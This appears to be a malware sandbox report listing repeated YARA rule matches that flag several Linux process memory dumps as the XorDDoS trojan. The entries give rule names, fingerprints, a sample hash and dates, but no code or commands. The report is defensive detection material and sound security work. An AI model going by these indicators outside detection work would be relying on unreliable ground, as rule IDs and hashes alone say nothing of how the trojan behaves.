Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
